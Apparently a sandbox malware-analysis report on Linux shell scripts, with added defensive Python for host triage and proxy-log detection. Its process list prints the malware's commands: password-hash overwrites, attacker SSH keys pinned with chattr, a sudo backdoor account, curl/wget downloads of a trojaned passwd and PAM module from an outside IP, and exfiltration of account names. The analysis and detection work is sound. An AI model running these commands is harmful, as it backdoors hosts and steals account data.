
/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke -m u]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart -m u]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.12

[/usr/bin/python3.12 -]

/bin/sh

[sh -c -- if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.8I0ItClD2x /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.8I0ItClD2x]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/tr

[tr \n ]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/样本/Linux/shc加密脚本/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

/usr/bin/chmod

[chmod 4755 /bin/passwd]

/usr/bin/chmod

[chmod u+s /bin/passwd]

/usr/bin/cp

[cp /bin/passwd /usr/bin/passwd]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/pam_tms]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/pam_tms]

/usr/bin/chmod

[chmod +x /sbin/pam_tms]

/usr/bin/grep

[grep -q pam_tms /etc/pam.d/common-auth]

/usr/sbin/useradd

[useradd cheeki]

/usr/sbin/usermod

[usermod -aG sudo cheeki]

/usr/sbin/usermod

[usermod -aG wheel cheeki]

/usr/sbin/usermod

[usermod -p $6$vrC8Hya.mmeUeIem$Li01KI3RQUpyYepjXUhHF23fTle/wXqAoR0xUFo697faBvmsuXJBTMMK89vGf1YHzhztRGGsNbA/eTIIRXy5Y/ cheeki]

/usr/bin/mv

[mv /var/tmp/.xrx/key /home/cheeki/.ssh/authorized_keys]

/usr/bin/mkdir

[mkdir /var/tmp/.x]

/usr/bin/mv

[mv /var/tmp/.xrx/secure /var/tmp/.x/secure]

/usr/bin/chmod

[chmod +x /var/tmp/.x/secure]

/var/tmp/.x/secure

[/var/tmp/.x/secure]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/tr

[tr \n ]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://179.43.154.189:1010/users?userlist=cm9vdCB1c2VyIGNoZWVraSA=]

/usr/bin/rm

[rm -rf /root/.bash_history]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/init0]

/usr/bin/rm

[rm -rf init0]
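The process list above records the persistence the script leaves behind: an attacker key copied over `/root/.ssh/authorized_keys` and the users' keys and pinned with `chattr +ia`, root and user password hashes replaced with `usermod -p`, the real `passwd` renamed to `passwd.orig` and a downloaded setuid replacement installed with `chmod 4755`, a `pam_tms` module dropped into `/sbin` and checked for in `/etc/pam.d/common-auth`, a `cheeki` account added to `sudo`/`wheel`, and a `/var/tmp/.x/secure` payload. The triage script below is an added example, not part of the sandbox report: it checks a host root or a mounted image for exactly those artefacts. The paths and names come from the process list; the demo tree it builds in a temporary directory is constructed data, and the `lsattr` check is skipped where the tool or the filesystem attributes are unavailable.

```python
"""Offline triage for the persistence artefacts in the process list above.
Added example, not part of the sandbox report."""
import hashlib
import os
import subprocess
import tempfile

BACKDOOR_USER = "cheeki"                          # useradd cheeki; usermod -aG sudo/wheel
PAM_MODULE = "pam_tms"                            # fetched to /sbin, grepped for in common-auth
DROP_DIRS = ("var/tmp/.xrx", "var/tmp/.x")        # staging dir and home of the `secure` payload
TROJANED_BINS = ("bin/passwd", "usr/bin/passwd")  # original -> passwd.orig, replacement chmod 4755


def _read(path):
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def _sha256(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def _has_ia_flags(path):
    """True when lsattr shows the i or a attribute (chattr +ia in the report);
    None if lsattr is missing or the filesystem has no attributes."""
    try:
        out = subprocess.run(["lsattr", "-d", path], capture_output=True, text=True)
    except OSError:
        return None
    if out.returncode != 0 or not out.stdout.split():
        return None
    flags = out.stdout.split()[0]
    return "i" in flags or "a" in flags


def check_image(root):
    """Return a list of findings for the filesystem rooted at `root`."""
    p = lambda *parts: os.path.join(root, *parts)
    rel = lambda path: "/" + os.path.relpath(path, root)
    findings = []

    for line in _read(p("etc/passwd")).splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[0] == BACKDOOR_USER:
            findings.append(f"backdoor account {f[0]} (uid {f[2]}, shell {f[6]})")
    for line in _read(p("etc/group")).splitlines():
        f = line.split(":")
        if len(f) >= 4 and f[0] in ("sudo", "wheel") and BACKDOOR_USER in f[3].split(","):
            findings.append(f"{BACKDOOR_USER} is a member of {f[0]}")

    for bin_rel in TROJANED_BINS:
        cur, orig = p(bin_rel), p(bin_rel + ".orig")
        if os.path.exists(orig):
            findings.append(f"/{bin_rel}.orig present: original binary was renamed")
            if os.path.exists(cur) and _sha256(cur) != _sha256(orig):
                findings.append(f"/{bin_rel} differs from the .orig copy (replaced setuid binary)")

    if os.path.exists(p("sbin", PAM_MODULE)):
        findings.append(f"/sbin/{PAM_MODULE} present")
    pam_dir = p("etc/pam.d")
    for name in (sorted(os.listdir(pam_dir)) if os.path.isdir(pam_dir) else []):
        if PAM_MODULE in _read(os.path.join(pam_dir, name)):
            findings.append(f"{PAM_MODULE} referenced in /etc/pam.d/{name}")

    for d in DROP_DIRS:
        if os.path.isdir(p(d)):
            findings.append(f"/{d} exists")

    homes = [p("root")]
    if os.path.isdir(p("home")):
        homes += [p("home", h) for h in sorted(os.listdir(p("home")))]
    for home in homes:
        ak = os.path.join(home, ".ssh", "authorized_keys")
        if not os.path.isfile(ak):
            continue
        keys = [k.split() for k in _read(ak).splitlines() if k.strip() and not k.startswith("#")]
        comments = [k[-1] for k in keys if len(k) >= 3]
        findings.append(f"{rel(ak)}: {len(keys)} key(s) {comments}")
        if _has_ia_flags(ak):
            findings.append(f"{rel(ak)} carries chattr i/a flags")
    return findings


def build_demo_tree(root):
    """Constructed infected layout mirroring the process list (demo data, not real files)."""
    def w(path, data, mode=None):
        full = os.path.join(root, path)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(data)
        if mode is not None:
            os.chmod(full, mode)
    w("etc/passwd", "root:x:0:0:root:/root:/bin/bash\nuser:x:1000:1000::/home/user:/bin/bash\n"
                    "cheeki:x:1001:1001::/home/cheeki:/bin/sh\n")
    w("etc/group", "sudo:x:27:user,cheeki\n")
    w("etc/pam.d/common-auth", "auth optional pam_tms.so\nauth [success=1 default=ignore] pam_unix.so nullok\n")
    w("sbin/pam_tms", "placeholder for the downloaded module\n")
    w("bin/passwd.orig", "placeholder for the original passwd\n", 0o4755)
    w("bin/passwd", "placeholder for the downloaded passwd\n", 0o4755)
    w("root/.ssh/authorized_keys", "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDER attacker@xrx\n")
    for d in DROP_DIRS:
        os.makedirs(os.path.join(root, d), exist_ok=True)


def demo():
    """Build the constructed tree in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return check_image(root)


if __name__ == "__main__":
    import sys
    for finding in (check_image(sys.argv[1]) if len(sys.argv) > 1 else demo()):
        print("[!]", finding)
```

Run with a mount point as the argument (`python3 triage.py /mnt/image`) or with no argument to see the findings on the constructed tree. A setuid bit on `passwd` is normal and is deliberately not reported; the tell in this run is the `.orig` backup next to a binary whose hash no longer matches it, and an `authorized_keys` that carries the immutable or append-only flag.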

Network

Country  Destination          Domain                            Proto
N/A      224.0.0.251:5353     -                                 udp
US       8.8.8.8:53           _http._tcp.se.archive.ubuntu.com  udp
US       8.8.8.8:53           se.archive.ubuntu.com             udp
US       8.8.8.8:53           se.archive.ubuntu.com             udp
SE       194.71.11.173:80     se.archive.ubuntu.com             tcp
IT       185.252.178.82:6972  -                                 tcp
IT       185.252.178.82:6972  -                                 tcp
IT       185.252.178.82:6972  -                                 tcp
IT       185.252.178.82:6972  -                                 tcp
CH       179.43.154.189:1010  -                                 tcp
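Two of the connections above are the script's own: the four sessions to 185.252.178.82:6972 are the `curl -sO`/`wget -q` downloads of `passwd` and `pam_tms`, and the session to 179.43.154.189:1010 is the `GET /users?userlist=...` whose parameter is the base64 of the shell-capable account names taken from `/etc/passwd` (`cm9vdCB1c2VyIGNoZWVraSA=` decodes to `root user cheeki `). The detection below is an added example, not part of the sandbox report: it matches those two endpoints in egress-proxy log lines and decodes the exfiltrated account list. The log lines are constructed demo data in a simple `<timestamp> <client> <method> <url>` format, not traffic captured from the run.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints from the Network table above.
PAYLOAD_HOST = "185.252.178.82:6972"   # served /passwd and /pam_tms to curl/wget
EXFIL_HOST = "179.43.154.189:1010"     # received GET /users?userlist=<base64 account names>

# Constructed egress-proxy log lines, "<timestamp> <client> <method> <url>".
# Demo data, not traffic from the sandbox run.
SAMPLE_LOG = """\
2024-11-27T05:50:01Z 10.0.0.5 GET http://se.archive.ubuntu.com/ubuntu/dists/InRelease
2024-11-27T05:50:12Z 10.0.0.5 GET http://185.252.178.82:6972/passwd
2024-11-27T05:50:13Z 10.0.0.5 GET http://185.252.178.82:6972/pam_tms
2024-11-27T05:50:20Z 10.0.0.5 GET http://179.43.154.189:1010/users?userlist=cm9vdCB1c2VyIGNoZWVraSA=
2024-11-27T05:51:00Z 10.0.0.7 GET http://example.org/index.html
"""
LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def decode_userlist(value):
    """The sample builds userlist as: shell accounts from /etc/passwd, joined
    by spaces, base64-encoded.  Return the account names, or None if the
    value is not valid base64."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", "replace").split()


def scan(log_text):
    """Return one alert dict per line that contacts a C2 endpoint."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, client, _method, url = m.groups()
        u = urlsplit(url)
        if u.netloc == PAYLOAD_HOST:
            alerts.append({"ts": ts, "client": client, "kind": "payload_download",
                           "detail": u.path.lstrip("/")})
        elif u.netloc == EXFIL_HOST and u.path == "/users":
            encoded = parse_qs(u.query).get("userlist", [""])[0]
            alerts.append({"ts": ts, "client": client, "kind": "account_exfil",
                           "detail": decode_userlist(encoded)})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The decoded account list is the same set of names the host-side `cat /etc/passwd | grep ... | cut -d: -f1` pipeline in the process list produces, so an `account_exfil` alert identifies which accounts the operator now expects to reach with the dropped key and the replaced password hashes.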

Files

/var/cache/apt/archives/partial/msr-tools_1.3-5build1_amd64.deb

MD5 41d685bb374b8b9765cc8ad68c6ddd7c
SHA1 4d7f9893b486db574f737fd82f89f1db05d44e4e
SHA256 aa668bd5e23e3f703518eec2e52fffd6275c897ba84ef8a34ef646ac4dde32f4
SHA512 b9d5800641b0fb294d1688faf9dbd0a461a6347f405ab106dc6e2c71a0667c9a39eeb95904a218e5af57683a4f1882876f4ab538aecde442f68265c7467127a0

/var/log/apt/eipp.log.xz

MD5 cc6206f59ec7a64c75f24e79d19c69f7
SHA1 9e5ede07f6b85a9105aa234fa3e78898c3997fb2
SHA256 a961625a91f21ebeed9d5b96cd4063dd72a067d1c41884809f5590573471fad5
SHA512 ce257843f03d72692c7890df5f59943263144314f5fd817bff690458ec26096bb3dec1bd87beb8310580e86618f28282bb1b26366f832ab2eb5ccd8f8ff12c2f

/var/lib/dpkg/updates/tmp.i

MD5 0c83c7b81780508a33c1ea43e49bd0ab
SHA1 1bd385df4de89b74a9e0eaeb42078a3aa13e7a56
SHA256 9c1311fe3442b3427006b95fafa9e55261702b36fbc90b3300e9aca091498dd1
SHA512 97328bd96c405168e5226780a4664f1a6c4406c7b3ec66899d898053346c3e070e7c7cf7e2b659a1781fe5822ec9a6440beb2047e98994977e576562f5d33747

/var/lib/dpkg/tmp.ci/control

MD5 1e0f0dfa728ed7715510e29d0c820cfa
SHA1 9e20884889df0752af14f0afcc0a6bbdb5470c62
SHA256 7263b977924b9c59af6a5ad7da21e3f85d24beb3c4f0d6515ff1eb06fc11af4a
SHA512 41afc8ea626977e98101a9cf492c0d9736f32cc4bb2d0496d2a46769807a01f5282ba00c07141956eea7c364c7b5ce8966b2a891b7dd77d3fdab84b4ccd1f2b2

/var/lib/dpkg/tmp.ci/md5sums

MD5 f0183116fb005f86b0d573c6473fae9b
SHA1 6672eb52c0cb916df1c6924ace41b81264ef0b8b
SHA256 b08ea9d4bf7879ee69d29795219f6958979932f80976133636eecf5d8e9f1272
SHA512 314038597f986c2e1816b865e085014905b92e94d73f08b11a0b560362edb48a335a708617ae310375619752514475c93e48f6a4461e7675206cb5ec884f3a81

/var/lib/dpkg/updates/tmp.i

MD5 6e67dede930df3bc51a5d372940d8c75
SHA1 03a54c296eb9f17c41ea1142f7f2c2c70d715e20
SHA256 087c445cd41888ce3da908be88a19b2bec608e999d92cf006a2aaaebf9452bde
SHA512 28867ada88b421d70616002150c5e91bbd402907365932f9b1a47e3a36233a4f16791e457ff7e1a59eaced3c4bf16626675b6d6e282a50fd9b94397b1126077b

/var/lib/dpkg/updates/tmp.i

MD5 34eb56f174133f283fdc94da47b268f3
SHA1 c68b6ee72b7027222df4bed6b2fba79a3c56b670
SHA256 ad6b382be033c06573cc513c010fe8b7f6be7d43194923bf5e488ed093b8fd83
SHA512 f5195388268211b15e3c27583138d541ec581cb8e3ccea4c26f40cace1a06826cf2997603bddac110e935f84453ca33af08c048d7be76951d9543f41ede2574d

/var/lib/dpkg/updates/tmp.i

MD5 05ffb6efd8d30243a913f95453c376ab
SHA1 d3b05c42a5c9db40d2f375f40764cc2c81e14fcc
SHA256 78b6c50455d3659bb7effbb14312d8eeea86c3a248d0a497e43cf4d6d7ea0be3
SHA512 4c008f42d41d0b150c70593bc9d30152b3738f3341a73d4d3ec1ec8c3e4194b0a633efc1a8570fbdbd29032c323686a58d8d2fc9c922e49d3c399db0c5e9f98b

/var/lib/dpkg/updates/tmp.i

MD5 edae9b7299f2afc09258160786a4dada
SHA1 dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256 cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA512 0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

/var/lib/dpkg/status-new

MD5 fda2311561ddfd0654505fa2cf369d91
SHA1 2a1be09d3084d3e2ff26e6048f4176af376b1a76
SHA256 0675b27fe2f05cf66d498e5ec5bb6f975aed807cf55440c03bb50a6800435500
SHA512 bef483a282d05f4bee4d3f0c353588cf03e1e7db8fcb9149c1c769a30bf1d247fd74c77485fa630317eff8c4dc6dc114319fdd7526e527e6f755ddb3e1e71e4c

/var/cache/man/2524

MD5 37106c0ca44953e5d7da743c5293634f
SHA1 8466df9e62da69995aaf6706af447e41c34b8010
SHA256 3e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512 e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555

/var/lib/dpkg/status-new

MD5 fc66f74346fb6e7b8d5593e437ceb6f3
SHA1 f35dc1b6a2457ea70067c1a5e48c10ba22fce953
SHA256 e26fb022c7efc9ae568e73e8b1f2034680d977bc2af726d50ce79a69ee0ad3a9
SHA512 68949144614c196d0d1bb9a94be6aa95670080115bcdb1253d1e66fdfd8244dbeda32c6dda2c8850275fc9382da452df58aafae1c2d5f8bbb0803ce1e7d3c425

/var/lib/update-notifier/tmp.8I0ItClD2x

MD5 9e4474dd78060139ab355ed18427f88e
SHA1 e4608e740783b34ab9917ce0a4f379a9c760e725
SHA256 6e285b096a5771d3f0f75b00ea3ce4df1fa1648b6f6ba2311bd8eb5e0c90c708
SHA512 777cad103870948f8109488fe8c02a2ef616aca87319c446d305bb6ddcc01093266bcf78d1e76871937bde94e175a72b574985b33f693e7e0e542b9ed9f87706

/etc/passwd+

MD5 cea58ef2a54a8678646f9398f140d2de
SHA1 46ab8bcd243efa9c87b3859cd342f683f168e133
SHA256 ec0d3574508143d89a5ca35fcc9fe9ae0b0a1a6b0d89f47cbe17ac1d9d88072a
SHA512 9d6879919c7aeb654b27bd67292ebd5e5799cf184d5b45e4debb2d2d8666aebd1e078bfaed7cdb360d0e79a69f01aae009ff5867bf1688389e373de422177d74

/etc/shadow+

MD5 dbe36c4790dde0f43497ef20eb0ed5a7
SHA1 76079e0236375edafd03eb755002f028274eea6e
SHA256 b43184992657b9ce2f704b3a6466dccb9cb1613ed68d39405d615593ec072fd6
SHA512 aba3db67f29732c506a29093fefc7d01494b736d7166193bcedca5500f0e5200b3202fba80c7276be74231ac5615924473fabeaa4b289bd4c597455acd92d933

/etc/shadow+

MD5 89e46234e78ed518c8389df3451d9266
SHA1 3b5fa44ab3c218dc3ee6f1206442b7f1b888d56a
SHA256 6e23ed46138dac8f8110a4f00cabc870f66f8abba307b812c28f125a6b4c6f4b
SHA512 c1c13cd2a1033f98435d2ba14591cced1189b64d57aa7aa92fe63aacde2874f9f2bd8e1c29a027a2c2863e36b8d2f0714d7db30d50e8544b4a9f82760a5b5aa1

/etc/passwd+

MD5 1a2923599c03f2da0e70bc13fc7d2fcb
SHA1 7c850050beffefcd03cee16c3f74cbe63c7f9680
SHA256 bbe8f1dd9974aba408b38e18b0628341bbec08f2493973ff9b6446fa03701823
SHA512 5d8f456ad7bd9a9e4bbf677b03665ee22f1ed9479ea1fbceb004e97dbcdd9a84248c32e017b786fede7baf037c2249078e2e24bc38215d8d4f099f773494fa80

/etc/shadow+

MD5 522d75bc5cce1b1e78f4712ee2103c83
SHA1 d8e739ee8738ca5ed67c6c7ebd8dd6bf754a1f3a
SHA256 0c10eb84053e72f8544c248c5b5e3108c165b01f2d51bc709cda3d7690984c25
SHA512 a55c55230897ab9690e282ec218b6cf6f87fdfbbdce8e54747bb4c4db455cf71d31a0d590e0bee4ff6277dc88e97c92b3b508ec4e710fc35df89075b4870ed26

/etc/group+

MD5 b43bcab2b519b1f1d699ab5c9dc418eb
SHA1 e983ed6f5c31b3706b9d3eaf5efdcfe932d653bc
SHA256 4f94732b04d039e70819b986801ab8bb50cc056284e4b4536d46beca0f546f43
SHA512 87999a80f6d7eee4761fd0bb4948235a3133354916ee9ccb8c30eef97a895245959c3bbc7574afbea2f5071194743c15526a7d627d6e2e3edd6ff31a3bf059e9

/etc/gshadow+

MD5 9452ee212552c9f49ebca01b6291a740
SHA1 85e33b01e1d041ad6809067ed50b1770c9be478f
SHA256 363cd5c14472d9750701c768b7657d191e8e76b899b83aca2366ec6c82481669
SHA512 0427539b0dc8fd4c62a0389062a9868615f8cdd21ef4f248dc84ce999f647936b95492377e8655ad903addda37f4c8edea09a1ffdd2e7c014825e62fbfd68f7a

/etc/subuid+

MD5 4641942396624780f617210b1c564db9
SHA1 5f87f6066aed9fdc0cc1a907a397ba383731ac57
SHA256 6ed2c35ec029779fb7f08108345965c99c171908cd125934943dfc6c9a17d32e
SHA512 dccd0d158d875f145746c5efa7b1e87f458d4f1d1b91391958cb6e669ad2f8060c49bef46d79af62b521b02c4d10e8e4e50b4245bed539284eed580b3e3d23ca

/etc/group+

MD5 84eb5d846ee7bfef527db974a5feb1b2
SHA1 e811387fb348ab546f82d60d66a0c9a9c9735d36
SHA256 c11f30bbdc83688d1329289c0f5324e9aa0b0b81365eb6375b953103a2c43456
SHA512 f1fbc838ce695cb448038b8732fb054fd6f5502b6203377eb339e5bcbb8eb877c4f8c10ba5c30591eab82de3603c0a228243dfda7611eff3ae14d9813d69a25b

/etc/gshadow+

MD5 5c0e7d545ff1cfa0ba68f27349507a87
SHA1 0aa5fc2c5a8e1be03ce1bf2b4e68b82de1eb8d47
SHA256 0e4b06466a4c58fbf83afd9939466b7c2a461c27ee876cbec97afae04e53e44b
SHA512 2913398db0dcd7d719c1b455d6d62797f042f99fe8653b97bd36d3354d659d05e400b8d3729254ec793ed37876d0045628f9bd26ba566e1a4bb86c3df39b1954

/etc/shadow+

MD5 42618d971aee1714cb3609180e4aeb22
SHA1 b9917df156232b25c5c0517a9495b28e1cc05181
SHA256 da8d47a70cba6c7d9e2d8892feff90a651293fd622f3d485e44f7f0a0006d33d
SHA512 d02cb266b0d61c96021edca59609fae505f2816fa8c36e6b8cd9f929ea9a80045a3293ac5b571ca0a362b2c860e4404587629f40c5184aa1dc0608a05a73f4f3

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-armhf-20240729-en

Max time kernel

0s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsbe-20240418-en

Max time kernel

3s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-armhf-20240611-en

Max time kernel

3s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/680/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/111/cmdline /usr/bin/killall N/A
File opened for reading /proc/323/stat /usr/bin/killall N/A
File opened for reading /proc/456/stat /usr/bin/killall N/A
File opened for reading /proc/135/stat /usr/bin/killall N/A
File opened for reading /proc/155/stat /usr/bin/killall N/A
File opened for reading /proc/649/stat /usr/bin/killall N/A
File opened for reading /proc/411/stat /usr/bin/killall N/A
File opened for reading /proc/656/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/263/stat /usr/bin/killall N/A
File opened for reading /proc/266/stat /usr/bin/killall N/A
File opened for reading /proc/681/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/656/cmdline /usr/bin/killall N/A
File opened for reading /proc/649/cmdline /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/307/stat /usr/bin/killall N/A
File opened for reading /proc/656/stat /usr/bin/killall N/A
File opened for reading /proc/212/stat /usr/bin/killall N/A
File opened for reading /proc/680/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/111/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/406/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/265/stat /usr/bin/killall N/A
File opened for reading /proc/679/stat /usr/bin/killall N/A
File opened for reading /proc/307/stat /usr/bin/killall N/A
File opened for reading /proc/680/cmdline /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
